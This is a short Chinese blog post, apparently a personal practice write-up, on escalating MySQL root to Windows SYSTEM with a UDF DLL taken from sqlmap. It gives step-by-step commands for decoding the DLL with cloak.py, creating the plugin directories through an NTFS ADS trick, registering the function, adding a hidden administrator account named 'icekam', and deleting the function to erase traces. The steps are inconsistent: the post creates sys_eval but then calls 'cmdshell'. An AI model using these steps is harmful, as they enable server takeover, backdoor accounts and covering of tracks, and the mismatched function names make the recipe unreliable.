前言

很久不玩提权了，练练手。

原理

udf = ‘user defined function‘，即‘用户自定义函数’。

文件后缀为‘.dll’，常用c语言编写。

通过在udf文件中定义新函数，对MYSQL的功能进行扩充，可以执行系统任意命令。将MYSQL账号root转化为系统system权限。

思路

将udf文件上传到指定位置

sqlmap中有现成的udf文件，分为32位和64位，一定要选择对版本，否则会显示：Can‘t open shared library ‘udf.dll‘。

sqlmap\udf\mysql\windows\32目录下存放着lib_mysqludf_sys.dll。

sqlmap\udf\mysql\windows\64目录下为64位的lib_mysqludf_sys.dll。

但是 sqlmap 中 自带 的shell 以及一些二进制文件，为了防止被误杀都经过异或方式编码，不能直接使用的。

可以利用 sqlmap 自带的解码工具cloak.py，进入到 sqlmap\extra\cloak\cloak 目录下，执行命令：

1

cloak.py -d -i D:\sqlmap\udf\mysql\windows\32\lib_mysqludf_sys.dll_

sqlmap中的udf文件提供的函数：

sys_eval，执行任意命令，并将输出返回。

sys_exec，执行任意命令，并将退出码返回。

sys_get，获取一个环境变量。

sys_set，创建或修改一个环境变量。

有了udf文件，接下来就是利用各种办法上传到网站指定目录下 

MySQL<5.0，导出路径随意；

5.0 <= MySQL<5.1，则需要导出至目标服务器的系统目录（如：c:/windows/system32/）

MySQL 5.1以上版本，必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。

一般Lib、Plugin文件夹需要手工建立（可用NTFS ADS流模式突破进而创建文件夹）

1
2
3
4
5

select @@basedir;  //查找到mysql的目录
 
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';    //利用NTFS ADS创建lib目录
 
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';    //利用NTFS ADS创建plugin目录

从udf文件中引入自定义函数

1

create function sys_eval returns string soname 'udf.dll';    //sys_eval是函数名称，udf.dll是lib_mysqludf_sys.dll_上传后的文件名

执行自定义函数

select cmdshell('net user icekam icekam.com /add'); 
//将icekam加入管理员组
select cmdshell('net localgroup administrators icekam /add');

清除痕迹

1
2
3

drop function cmdshell; 删除函数
 
delete from mysql.func where name='cmdshell'  删除函数

总结

其实在后渗透阶段，提权往往是重中之重，以前往往是点到为止，有点儿忽视提权方面，多多练习。